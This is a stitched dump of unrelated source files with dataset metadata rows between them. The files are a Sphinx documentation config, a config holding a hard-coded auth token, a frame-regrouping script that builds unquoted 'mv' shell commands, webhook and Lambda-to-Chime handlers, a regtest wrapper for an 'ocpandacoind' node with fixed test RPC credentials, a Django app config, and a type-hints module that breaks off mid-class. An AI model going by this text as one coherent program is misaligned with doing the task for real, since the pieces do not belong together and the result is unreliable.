# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**/.git', '**/.unison', '.unison']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
# html_theme = 'classic'
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'CADISHI v1.0.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'CADISHIdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'CADISHI.tex', u'CADISHI Documentation',
u'Klaus Reuter, Juergen Koefinger', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, will not define \strong, \code, \titleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cadishi', u'CADISHI Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'CADISHI', u'CADISHI Documentation',
author, 'CADISHI', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| 29.469613
| 91
| 0.706599
|
ac8fe7d7507974528ee5e54d89288f51fd8d4d33
| 129
|
py
|
Python
|
things/config.py
|
kxnes/things
|
8b97aff8c7e7f80314f99a8974338b96720b2fd6
|
[
"MIT"
] | null | null | null |
things/config.py
|
kxnes/things
|
8b97aff8c7e7f80314f99a8974338b96720b2fd6
|
[
"MIT"
] | null | null | null |
things/config.py
|
kxnes/things
|
8b97aff8c7e7f80314f99a8974338b96720b2fd6
|
[
"MIT"
] | 1
|
2020-06-22T17:51:45.000Z
|
2020-06-22T17:51:45.000Z
|
# == Auth == #
AUTH_TOKEN_HEADER = 'X-Semrush-Test'
AUTH_TOKEN_VALUE = 'DSJAKJSAKSKLFLA-LK'
# == Pagination == #
PER_PAGE = 10
| 16.125
| 39
| 0.666667
|
f0cb9ff2bf205534312bdaa5fc8546ca5ddc972a
| 1,317
|
py
|
Python
|
codes/data_scripts/regroup_SDR4K_sub.py
|
Yangzhen0000/EDVR
|
388ae869a1b4e2e6399f5feeea1f3acc969a3c75
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/regroup_SDR4K_sub.py
|
Yangzhen0000/EDVR
|
388ae869a1b4e2e6399f5feeea1f3acc969a3c75
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/regroup_SDR4K_sub.py
|
Yangzhen0000/EDVR
|
388ae869a1b4e2e6399f5feeea1f3acc969a3c75
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import glob
import os.path as osp
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from utils.util import ProgressBar
dataset_path = '../../datasets/SDR4k/train/SDR_10BIT_sub/'
video_path_list = glob.glob(os.path.join(dataset_path, '*'))
pbar = ProgressBar(len(video_path_list))
for video_path in video_path_list:
print('Processing video', video_path)
frame_path_list = glob.glob(os.path.join(video_path, '*'))
# print(frame_path_list)
patch_name_list = sorted(os.listdir(frame_path_list[0]))
# print(patch_name_list)
video_path, video_name = os.path.split(video_path)
# print(video_path, video_name)
for patch_name in patch_name_list:
save_name = '{}_{}'.format(video_name, os.path.splitext(patch_name)[0])
save_dir = os.path.join(video_path, save_name)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
print("Making dir {}".format(save_dir))
for frame_path in frame_path_list:
frame_name = '{}.png'.format(osp.basename(frame_path))
os.system('mv {} {}'.format(os.path.join(frame_path, patch_name), osp.join(save_dir, frame_name)))
# print('mv {} {}'.format(os.path.join(frame_path, patch_name), osp.join(save_dir, frame_name)))
pbar.update()
| 42.483871
| 110
| 0.690205
|
7e27bfbcc90c8dc55b8f91c1637844f77b15ebfd
| 986
|
py
|
Python
|
modulepackage/redisimport/redisloader.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/redisimport/redisloader.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/redisimport/redisloader.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
# redisloader.py
import redis
import importlib.util
class RedisImporter(object):
def __init__(self, *args, **kwargs):
self.conn = redis.Redis(*args, **kwargs)
self.conn.exists('test')
def find_spec(self, name, path, target=None):
origin = name + '.py'
if self.conn.exists(origin):
loader = RedisLoader(origin, self.conn)
return importlib.util.spec_from_loader(name, loader)
return None
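    # Note: intended to be called on the class itself, e.g. RedisImporter.enable(...);
    # it takes no `self` and installs a fresh RedisImporter at the front of sys.meta_path.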
def enable(*args, **kwargs):
import sys
sys.meta_path.insert(0, RedisImporter(*args, **kwargs))
class RedisLoader(object):
def __init__(self, origin, conn):
self.origin = origin
self.conn = conn
def create_module(self, spec):
return None
def exec_module(self, module):
code = self.conn.get(self.origin)
exec(code, module.__dict__)
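# --- Illustrative usage sketch (not part of the original module) ---
# Stores a tiny module under a "<name>.py" key, enables the importer, then
# imports it like any other module. The Redis host/port and the module name
# are assumptions for illustration; a local Redis server must be running.
if __name__ == "__main__":
    conn = redis.Redis(host="localhost", port=6379)
    conn.set("greeting.py", b"def hello():\n    return 'hello from redis'\n")

    RedisImporter.enable(host="localhost", port=6379)

    import greeting  # resolved via RedisImporter/RedisLoader
    print(greeting.hello())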
| 30.8125
| 147
| 0.549696
|
a06e8cee0ee8437f83ff70a6d36d1512198e8b6a
| 552
|
py
|
Python
|
src/handlers.py
|
keetonian/lambda-to-chime
|
1edaec34d031d6c1a55d1319e8890cd04f277aae
|
[
"MIT"
] | 1
|
2021-10-05T13:08:26.000Z
|
2021-10-05T13:08:26.000Z
|
src/handlers.py
|
keetonian/lambda-to-chime
|
1edaec34d031d6c1a55d1319e8890cd04f277aae
|
[
"MIT"
] | null | null | null |
src/handlers.py
|
keetonian/lambda-to-chime
|
1edaec34d031d6c1a55d1319e8890cd04f277aae
|
[
"MIT"
] | null | null | null |
"""Lambda function handler."""
# must be the first import in files with lambda function handlers
import lambdainit # noqa: F401
import config
import lambdalogging
import chime
from exceptions import InputError
LOG = lambdalogging.getLogger(__name__)
def post_to_chime(event, context):
"""Lambda function handler."""
LOG.info('Received event: %s', event)
if not isinstance(event, list):
raise InputError(event, "Input needs to be a json array")
for message in event:
chime.post_message(config.CHIME_URL, message)
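# --- Illustrative local invocation sketch (not part of the original handler) ---
# The handler expects the event to be a JSON array; each entry is forwarded to
# the Chime webhook configured via config.CHIME_URL. The sample messages below
# are assumptions for illustration only.
if __name__ == "__main__":
    sample_event = ["deployment finished", "all tests passing"]
    post_to_chime(sample_event, context=None)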
| 24
| 65
| 0.728261
|
aac16d2137cd9b65d825e9a6d7d2b6ea590fd938
| 13,103
|
py
|
Python
|
test/integration/ocpandacoind_node.py
|
overcookedpanda/OCPandaCoin
|
88fdafe2ae9959d41894ca84e5d74d4942b9d72b
|
[
"MIT"
] | null | null | null |
test/integration/ocpandacoind_node.py
|
overcookedpanda/OCPandaCoin
|
88fdafe2ae9959d41894ca84e5d74d4942b9d72b
|
[
"MIT"
] | null | null | null |
test/integration/ocpandacoind_node.py
|
overcookedpanda/OCPandaCoin
|
88fdafe2ae9959d41894ca84e5d74d4942b9d72b
|
[
"MIT"
] | null | null | null |
import os
import time
from pathlib import Path
from pypoptools.pypoptesting.framework.bin_util import assert_dir_accessible, get_open_port
from pypoptools.pypoptesting.framework.entities import *
from pypoptools.pypoptesting.framework.json_rpc import JsonRpcApi, JsonRpcException
from pypoptools.pypoptesting.framework.managers import ProcessManager
from pypoptools.pypoptesting.framework.node import Node
from pypoptools.pypoptesting.framework.sync_util import wait_until
PORT_MIN = 15000
PORT_MAX = 25000
BIND_TO = '127.0.0.1'
def _write_ocpandacoin_conf(datadir, p2p_port, rpc_port, rpc_user, rpc_password):
bitcoin_conf_file = Path(datadir, "ocpandacoin.conf")
with open(bitcoin_conf_file, 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("[{}]\n".format("regtest"))
f.write("port={}\n".format(p2p_port))
f.write("rpcport={}\n".format(rpc_port))
f.write("rpcuser={}\n".format(rpc_user))
f.write("rpcpassword={}\n".format(rpc_password))
f.write("fallbackfee=0.0002\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("dnsseed=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
f.write("upnp=0\n")
f.write("shrinkdebugfile=0\n")
f.write("popvbknetwork=regtest\n")
f.write("popbtcnetwork=regtest\n")
f.write("poplogverbosity=info\n")
class OCPandaCoindNode(Node):
def __init__(self, number: int, datadir: Path):
self.number = number
p2p_port = get_open_port(PORT_MIN, PORT_MAX, BIND_TO)
self.p2p_address = "{}:{}".format(BIND_TO, p2p_port)
rpc_port = get_open_port(PORT_MIN, PORT_MAX, BIND_TO)
rpc_url = "http://{}:{}/".format(BIND_TO, rpc_port)
rpc_user = 'testuser'
rpc_password = 'testpassword'
self.rpc = JsonRpcApi(rpc_url, user=rpc_user, password=rpc_password)
ocpandacoind_path = os.environ.get('OCPANDACOIN_PATH')
        if ocpandacoind_path is None:
raise Exception("OCPANDACOIN_PATH env var is not set. Set up the path to the ocpandacoind binary to the OCPANDACOIN_PATH env var")
exe = Path(Path.cwd(), ocpandacoind_path)
        if not exe.exists():
raise Exception("OCPandaCoinNode: ocpandacoind is not found in PATH")
assert_dir_accessible(datadir)
args = [
exe,
"-datadir=" + str(datadir),
"-logtimemicros",
"-logthreadnames",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-txindex",
"-uacomment=testnode{}".format(number)
]
self.manager = ProcessManager(args, datadir)
_write_ocpandacoin_conf(datadir, p2p_port, rpc_port, rpc_user, rpc_password)
def start(self) -> None:
self.manager.start()
wait_until(lambda: self.is_rpc_available(), timeout=60)
def is_rpc_available(self) -> bool:
try:
self.rpc.getblockcount()
return True
except Exception as e:
return False
def stop(self) -> None:
self.manager.stop()
def connect(self, node):
self.rpc.addnode(node.p2p_address, 'onetry')
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in self.rpc.getpeerinfo()))
def disconnect(self, node):
node_num = node.number
for peer_id in [peer['id'] for peer in self.rpc.getpeerinfo() if
"testnode{}".format(node_num) in peer['subver']]:
try:
self.rpc.disconnectnode(address='', nodeid=peer_id)
except JsonRpcException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(
lambda: not any(["testnode{}".format(node_num) in peer['subver'] for peer in self.rpc.getpeerinfo()]),
timeout=5)
def getpeers(self) -> List[Peer]:
s = self.rpc.getpeerinfo()
return [
Peer(
id=peer['id'],
banscore=peer['banscore']
)
for peer in s
]
def getbalance(self) -> int:
# convert to satoshi
return int(self.rpc.getbalance() * 10**8)
def getnewaddress(self) -> str:
return self.rpc.getnewaddress()
def getpayoutinfo(self, address: str = None) -> Hexstr:
address = address or self.getnewaddress()
s = self.rpc.validateaddress(address)
return s['scriptPubKey']
def generate(self, nblocks: int, address: str = None) -> None:
address = address or self.getnewaddress()
for i in range(nblocks):
self.rpc.generatetoaddress(1, address)
tip_hash = self.getbestblockhash()
tip = self.rpc.getblock(tip_hash)
tip_time = tip['time']
current_time = int(time.time())
if current_time < tip_time:
time.sleep(tip_time - current_time)
def getbestblockhash(self) -> Hexstr:
return self.rpc.getbestblockhash()
def getblock(self, hash: Hexstr) -> BlockWithPopData:
s = self.rpc.getblock(hash)
return BlockWithPopData(
hash=s['hash'],
height=s['height'],
prevhash=s.get('previousblockhash', ''),
confirmations=s['confirmations'],
endorsedBy=s['pop']['state']['endorsedBy'] if s['pop']['state'] else [],
blockOfProofEndorsements=[],
containingATVs=s['pop']['data']['atvs'],
containingVTBs=s['pop']['data']['vtbs'],
containingVBKs=s['pop']['data']['vbkblocks']
)
def getblockcount(self) -> int:
return self.rpc.getblockcount()
def getblockhash(self, height: int) -> Hexstr:
return self.rpc.getblockhash(height)
def getbtcbestblockhash(self) -> Hexstr:
return self.rpc.getbtcbestblockhash()
def getpopdatabyhash(self, hash: Hexstr) -> GetpopdataResponse:
s = self.rpc.getpopdatabyhash(hash)
return GetpopdataResponse(
header=s['block_header'],
authenticated_context=s['authenticated_context']['serialized'],
last_known_vbk_block=s['last_known_veriblock_blocks'][-1],
last_known_btc_block=s['last_known_bitcoin_blocks'][-1],
)
def getpopdatabyheight(self, height: int) -> GetpopdataResponse:
s = self.rpc.getpopdatabyheight(height)
return GetpopdataResponse(
header=s['block_header'],
authenticated_context=s['authenticated_context']['serialized'],
last_known_vbk_block=s['last_known_veriblock_blocks'][-1],
last_known_btc_block=s['last_known_bitcoin_blocks'][-1],
)
def getpopparams(self) -> PopParamsResponse:
s = self.rpc.getpopparams()
bootstrap = GenericBlock(
hash=s['bootstrapBlock']['hash'],
prevhash=s['bootstrapBlock']['previousBlock'],
height=s['bootstrapBlock']['height']
)
vbkBootstrap = BlockAndNetwork(
block=GenericBlock(
hash=s['vbkBootstrapBlock']['hash'],
prevhash=s['vbkBootstrapBlock'].get('previousBlock', ''),
height=s['vbkBootstrapBlock']['height']
),
network=s['vbkBootstrapBlock']['network']
)
btcBootstrap = BlockAndNetwork(
block=GenericBlock(
hash=s['btcBootstrapBlock']['hash'],
prevhash=s['btcBootstrapBlock'].get('previousBlock', ''),
height=s['btcBootstrapBlock']['height']
),
network=s['btcBootstrapBlock']['network']
)
return PopParamsResponse(
popActivationHeight=s['popActivationHeight'],
popPayoutDelay=s['payoutParams']['popPayoutDelay'],
bootstrapBlock=bootstrap,
vbkBootstrap=vbkBootstrap,
btcBootstrap=btcBootstrap,
networkId=s['networkId'],
maxVbkBlocksInAltBlock=s['maxVbkBlocksInAltBlock'],
maxVTBsInAltBlock=s['maxVTBsInAltBlock'],
maxATVsInAltBlock=s['maxATVsInAltBlock'],
endorsementSettlementInterval=s['endorsementSettlementInterval'],
finalityDelay=s['finalityDelay'],
keystoneInterval=s['keystoneInterval'],
maxAltchainFutureBlockTime=s['maxAltchainFutureBlockTime'],
maxReorgDistance=s['maxReorgDistance']
)
def getrawatv(self, atvid: Hexstr) -> AtvResponse:
s = self.rpc.getrawatv(atvid, 1)
r = AtvResponse()
r.in_active_chain = s['in_active_chain']
r.confirmations = s['confirmations']
if r.confirmations > 0:
# in block
r.blockhash = s['blockhash']
r.blockheight = s['blockheight']
r.containingBlocks = s['containing_blocks']
a = s['atv']
tx = a['transaction']
pd = tx['publicationData']
bop = a['blockOfProof']
r.atv = ATV(
id=a['id'],
tx=VbkTx(
hash=tx['hash'],
publicationData=PublicationData(**pd)
),
blockOfProof=GenericBlock(
hash=bop['hash'],
prevhash=bop['previousBlock'],
height=bop['height']
)
)
return r
def getrawpopmempool(self) -> RawPopMempoolResponse:
s = self.rpc.getrawpopmempool()
return RawPopMempoolResponse(**s)
def getrawvbkblock(self, vbkblockid: Hexstr) -> VbkBlockResponse:
s = self.rpc.getrawvbkblock(vbkblockid, 1)
r = VbkBlockResponse()
r.in_active_chain = s['in_active_chain']
r.confirmations = s['confirmations']
if r.confirmations > 0:
# in block
r.blockhash = s['blockhash']
r.blockheight = s['blockheight']
r.containingBlocks = s['containing_blocks']
r.vbkblock = VbkBlock(**s['vbkblock'])
return r
def getrawvtb(self, vtbid: Hexstr) -> VtbResponse:
s = self.rpc.getrawvtb(vtbid, 1)
r = VtbResponse()
r.in_active_chain = s['in_active_chain']
r.confirmations = s['confirmations']
if r.confirmations > 0:
# in block
r.blockhash = s['blockhash']
r.blockheight = s['blockheight']
r.containingBlocks = s['containing_blocks']
v = s['vtb']
tx = v['transaction']
cb = v['containingBlock']
r.vtb = VTB(
id=v['id'],
tx=VbkPopTx(
hash=tx['hash'],
publishedBlock=VbkBlock(**tx['publishedBlock']),
blockOfProof=BtcBlock(**tx['blockOfProof']),
blockOfProofContext=[BtcBlock(**x) for x in tx['blockOfProofContext']]
),
containingBlock=GenericBlock(
hash=cb['hash'],
prevhash=cb['previousBlock'],
height=cb['height']
)
)
return r
def getvbkbestblockhash(self) -> Hexstr:
return self.rpc.getvbkbestblockhash()
def submitpopatv(self, atv: Hexstr) -> SubmitPopResponse:
s = self.rpc.submitpopatv(atv)
return SubmitPopResponse(
accepted=s['accepted'],
code=s.get('code', ''),
message=s.get('message', '')
)
def submitpopvbk(self, vbk: Hexstr) -> SubmitPopResponse:
s = self.rpc.submitpopvbk(vbk)
return SubmitPopResponse(
accepted=s['accepted'],
code=s.get('code', ''),
message=s.get('message', '')
)
def submitpopvtb(self, vtb: Hexstr) -> SubmitPopResponse:
s = self.rpc.submitpopvtb(vtb)
return SubmitPopResponse(
accepted=s['accepted'],
code=s.get('code', ''),
message=s.get('message', '')
)
def getrpcfunctions(self) -> RpcFunctions:
return RpcFunctions(
get_popdata_by_height = 'getpopdatabyheight',
get_popdata_by_hash = 'getpopdatabyhash',
submit_atv = 'submitpopatv',
submit_vtb = 'submitpopvtb',
submit_vbk = 'submitpopvbk',
get_missing_btc_block_hashes = 'getmissingbtcblockhashes',
extract_block_info = 'extractblockinfo',
get_vbk_block = 'getvbkblock',
get_btc_block = 'getbtcblock',
get_vbk_best_block_hash = 'getvbkbestblockhash',
get_btc_best_block_hash = 'getbtcbestblockhash',
get_raw_atv = 'getrawatv',
get_raw_vtb = 'getrawvtb',
)
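# --- Illustrative usage sketch (not part of the original module) ---
# Spins up two regtest nodes, connects them, and mines one block on the first.
# OCPANDACOIN_PATH must point at the ocpandacoind binary; the temporary datadir
# layout below is an assumption for illustration only.
if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        datadirs = [Path(tmp, "node0"), Path(tmp, "node1")]
        for datadir in datadirs:
            datadir.mkdir(parents=True, exist_ok=True)

        node0 = OCPandaCoindNode(0, datadirs[0])
        node1 = OCPandaCoindNode(1, datadirs[1])
        node0.start()
        node1.start()
        node0.connect(node1)

        node0.generate(1)
        print("tip:", node0.getbestblockhash(), "height:", node0.getblockcount())

        node0.stop()
        node1.stop()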
| 36.600559
| 142
| 0.588568
|
b8f2bd3c240d6a49218abacbbe32b9cc291c69a6
| 83
|
py
|
Python
|
webhooks_config.py
|
boyska/python-github-webhooks
|
570d9cbbcbe99f5d656019749972367b31892ca5
|
[
"Apache-2.0"
] | null | null | null |
webhooks_config.py
|
boyska/python-github-webhooks
|
570d9cbbcbe99f5d656019749972367b31892ca5
|
[
"Apache-2.0"
] | null | null | null |
webhooks_config.py
|
boyska/python-github-webhooks
|
570d9cbbcbe99f5d656019749972367b31892ca5
|
[
"Apache-2.0"
] | 1
|
2018-10-24T08:16:56.000Z
|
2018-10-24T08:16:56.000Z
|
GITHUB_IPS_ONLY = False
ENFORCE_SECRET = ""
RETURN_SCRIPTS_INFO = True
PORT = 8000
| 16.6
| 26
| 0.783133
|
421c88024e20a52dd3138ac19c438111f7322468
| 120
|
py
|
Python
|
vue_ema/users/apps.py
|
munapaula/vue_ema
|
5aeaa3da426cc7e9d3c162696b1cacd1acf31211
|
[
"MIT"
] | null | null | null |
vue_ema/users/apps.py
|
munapaula/vue_ema
|
5aeaa3da426cc7e9d3c162696b1cacd1acf31211
|
[
"MIT"
] | null | null | null |
vue_ema/users/apps.py
|
munapaula/vue_ema
|
5aeaa3da426cc7e9d3c162696b1cacd1acf31211
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'vue_ema.users'
verbose_name = 'Users'
| 17.142857
| 33
| 0.725
|
c7a1876d22a9a4d1dd14c2e59af7b06dfdedfb84
| 6,465
|
py
|
Python
|
colour/hints/__init__.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | 1
|
2022-02-12T06:28:15.000Z
|
2022-02-12T06:28:15.000Z
|
colour/hints/__init__.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
colour/hints/__init__.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Annotation Type Hints
=====================
Defines the annotation type hints; the module exposes many aliases from
:mod:`typing` and :mod:`numpy.typing` to avoid having to handle multiple
imports.
"""
from __future__ import annotations
import numpy as np
import numpy.typing as npt
import re
from types import ModuleType
from typing import (
Any,
Callable,
Dict,
Generator,
Iterable,
Iterator,
List,
Mapping,
NewType,
Optional,
Union,
Sequence,
TextIO,
Tuple,
TYPE_CHECKING,
Type,
TypeVar,
cast,
)
from typing_extensions import runtime_checkable
try:
from typing import (
Literal,
Protocol,
SupportsIndex,
TypedDict,
)
# TODO: Drop "typing_extensions" when "Google Colab" uses Python >= 3.8.
except ImportError: # pragma: no cover
from typing_extensions import ( # type: ignore[misc]
Literal,
Protocol,
SupportsIndex,
TypedDict,
)
__author__ = "Colour Developers"
__copyright__ = "Copyright (C) 2013-2022 - Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"Any",
"Callable",
"Dict",
"Generator",
"Iterable",
"Iterator",
"List",
"Mapping",
"ModuleType",
"Optional",
"Union",
"Sequence",
"SupportsIndex",
"TextIO",
"Tuple",
"Type",
"TypedDict",
"TypeVar",
"RegexFlag",
"DTypeBoolean",
"DTypeInteger",
"DTypeFloating",
"DTypeNumber",
"DTypeComplex",
"DType",
"Integer",
"Floating",
"Number",
"Complex",
"Boolean",
"Literal",
"Dataclass",
"NestedSequence",
"ArrayLike",
"IntegerOrArrayLike",
"FloatingOrArrayLike",
"NumberOrArrayLike",
"ComplexOrArrayLike",
"BooleanOrArrayLike",
"ScalarType",
"StrOrArrayLike",
"NDArray",
"IntegerOrNDArray",
"FloatingOrNDArray",
"NumberOrNDArray",
"ComplexOrNDArray",
"BooleanOrNDArray",
"StrOrNDArray",
"TypeInterpolator",
"TypeExtrapolator",
"TypeLUTSequenceItem",
"LiteralWarning",
"cast",
]
Any = Any
Callable = Callable
Dict = Dict
Generator = Generator
Iterable = Iterable
Iterator = Iterator
List = List
Mapping = Mapping
ModuleType = ModuleType
Optional = Optional
Union = Union
Sequence = Sequence
SupportsIndex = SupportsIndex
TextIO = TextIO
Tuple = Tuple
Type = Type
TypedDict = TypedDict
TypeVar = TypeVar
RegexFlag = NewType("RegexFlag", re.RegexFlag)
DTypeInteger = Union[
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
]
DTypeFloating = Union[np.float16, np.float32, np.float64]
DTypeNumber = Union[DTypeInteger, DTypeFloating]
DTypeComplex = Union[np.csingle, np.cdouble]
DTypeBoolean = np.bool_
DType = Union[DTypeBoolean, DTypeNumber, DTypeComplex]
Integer = int
Floating = float
Number = Union[Integer, Floating]
Complex = complex
Boolean = bool
# TODO: Use "typing.Literal" when minimal Python version is raised to 3.8.
Literal = Literal
# TODO: Revisit to use Protocol.
Dataclass = Any
NestedSequence = npt._NestedSequence
ArrayLike = npt.ArrayLike
IntegerOrArrayLike = Union[Integer, ArrayLike]
FloatingOrArrayLike = Union[Floating, ArrayLike]
NumberOrArrayLike = Union[Number, ArrayLike]
ComplexOrArrayLike = Union[Complex, ArrayLike]
BooleanOrArrayLike = Union[Boolean, ArrayLike]
StrOrArrayLike = Union[str, ArrayLike]
ScalarType = TypeVar("ScalarType", bound=np.generic, covariant=True)
# TODO: Use "numpy.typing.NDArray" when minimal Numpy version is raised to
# 1.21.
if TYPE_CHECKING: # pragma: no cover
NDArray = np.ndarray[Any, np.dtype[ScalarType]]
else:
NDArray = np.ndarray
# TODO: Drop when minimal Python is raised to 3.9.
if TYPE_CHECKING: # pragma: no cover
IntegerOrNDArray = Union[Integer, NDArray[DTypeInteger]]
FloatingOrNDArray = Union[Floating, NDArray[DTypeFloating]]
NumberOrNDArray = Union[
Number, NDArray[Union[DTypeInteger, DTypeFloating]]
]
ComplexOrNDArray = Union[Complex, NDArray[DTypeComplex]]
BooleanOrNDArray = Union[Boolean, NDArray[DTypeBoolean]]
StrOrNDArray = Union[str, NDArray[np.str_]]
else:
IntegerOrNDArray = Union[Integer, NDArray]
FloatingOrNDArray = Union[Floating, NDArray]
NumberOrNDArray = Union[Number, NDArray]
ComplexOrNDArray = Union[Complex, NDArray]
BooleanOrNDArray = Union[Boolean, NDArray]
StrOrNDArray = Union[str, NDArray]
class TypeInterpolator(Protocol):
x: NDArray
y: NDArray
def __init__(self, *args: Any, **kwargs: Any):
... # pragma: no cover
def __call__(self, x: FloatingOrArrayLike) -> FloatingOrNDArray:
... # pragma: no cover
class TypeExtrapolator(Protocol):
interpolator: TypeInterpolator
def __init__(self, *args: Any, **kwargs: Any):
... # pragma: no cover
def __call__(self, x: FloatingOrArrayLike) -> FloatingOrNDArray:
... # pragma: no cover
@runtime_checkable
class TypeLUTSequenceItem(Protocol):
def apply(self, RGB: ArrayLike, **kwargs: Any) -> NDArray:
